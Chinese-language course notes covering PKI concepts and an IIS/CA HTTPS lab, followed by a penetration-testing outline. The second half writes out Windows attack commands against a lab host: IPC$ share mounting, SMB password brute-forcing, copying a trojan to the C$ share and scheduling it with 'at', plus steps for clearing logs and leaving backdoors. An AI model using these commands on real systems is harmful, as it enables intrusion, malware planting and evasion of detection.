PKI-渗透测试
PKI
PKI概述
名称:PKI(Public Key Infrustructure)公钥基础设施
作用:通过加密技术和数字签名保证信息安全。
组成:公钥加密技术,数字证书,CA,RA。
信息安全三要素
机密性,完整性,身份验证/操作的不可否认性
哪些IT领域用到PKI
- SSL/HTTPS
- IPsecVPN
- 部分远程访问VPN
公钥加密技术
作用:实现对信息加密,数字签名等安全保障。
加密算法:
对称加密算法
加解密的密钥一致
DES 3DES AES
x+5=y(对称加密算法)
x是原数据/原文
y是密文
5是key/密钥
非对称密钥
通信双方各自产生一对公私钥
双方各自交换公钥
公钥和私钥为互相加解密关系
公私钥不可相互逆推
RSA DH
HASH算法:MD5,SHA(验证完整性)
HASH值可逆吗?不可逆。
HASH值=摘要
数字签名
用自己的私钥对摘要进行加密得出的密文就是数字签名
证书
证书用于保证密钥的合法性
证书格式遵循x.509标准
数字证书包含信息:
使用者的公钥值
使用者标识信息(如名称和电子邮件地址)
有效期(证书的有效时间)
颁发者标识信息
颁发者的数字签名
数字证书由权威公正的第三方机构即CA签发
CA是权威证书颁发机构,为了公正”公钥”的合法性
机密性:使用对方的公钥加密
身份验证/数字签名:使用自己的私钥
PKI实验:
- win2008作为https服务器:10.1.1.2/24
- xp作为客户机:10.1.1.1/24
- 桥接到虚拟机网络vmenet1
实验步骤:
- 配置服务器ip地址10.1.1.2/24
- 安装IIS服务,并建立一个站点。(必须使用域名),在客户机上设置hosts,并初步验证访问。
- 安装CA组件
- 打开IIS,先生成证书申请文件
- 向CA申请证书,打开网页http:10.1.1.2/certsrv并向CA发送web服务器申请文件
- CA颁发证书
- 在web服务器上下载并安装
- 在web服务器上启用SSL443
- 在客户端上修改hosts文件,并验证
- 要求用户必须使用443访问,不能使用80访问
渗透测试流程
授权
信息收集
nslookup,whois
扫描漏洞
namp=ip范围 端口 80(IIS,apache,什么网站)scanpot软件
高级扫描:ruIIS漏洞2003-IIS6.0 2008IIS7.0,扫描网站漏洞
漏洞利用
提权(shell环境,桌面环境,最高权限)
清除日志
留后门
渗透测试报告
测试端口号开放
- (手动)telnet 目标ip 目标端口号
- 使用scanpot软件工具进行端口扫描(推荐Nmap)
利用漏洞进行破解
445漏洞利用之IPC$:
使用命令:net use f: \10.1.1.2\ipc$ 密码 /user:用户
相关命令:
net use f: /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户
net use f: \10.1.1.2\share 密码 /user:用户
暴力破解系统密码之445
NTscan+密码字典生成工具
留后门
大鲨鱼,冰河,灰鸽子软件编写木马
制作木马
copy植入木马
copy d:\heihei.exe \\10.1.1.2\c$
获取目标时间
net time \\10.1.1.2
net time \\ 目标IP地址(两个\后紧跟地址)
设置计划任务自动执行
at \\10.1.1.2 11:11 “c:\heihei.exe”
at \\10.1.1.2 11:11 “木马程序位置”
查看程序是否存在
at \\目标ip